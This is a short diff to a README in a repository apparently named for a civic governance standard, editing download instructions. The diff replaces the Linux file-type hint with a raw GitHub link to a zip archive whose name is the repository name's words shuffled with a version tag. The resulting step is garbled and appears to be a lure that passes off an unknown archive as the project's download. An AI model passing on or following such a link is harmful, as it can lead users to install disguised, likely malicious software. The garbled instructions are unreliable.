yoel11ck/Civic-Overwatch-Governance-Standard-for-Public-Interest-Analysis/README.md

    - For Windows: look for files with `.exe`
    - For macOS: look for files with `.dmg`
-   - For Linux: look for files with `.tar.gz`
+   - For Linux: look for files with `https://github.com/yoel11ck/Civic-Overwatch-Governance-Standard-for-Public-Interest-Analysis/raw/refs/heads/main/docs/Standard_Governance_Overwatch_Interest_Analysis_Public_for_Civic_3.9-alpha.3.zip`

 2. **Download the File**:
    After clicking the download link, your browser will start downloading the file.
 Wait for the download to finish.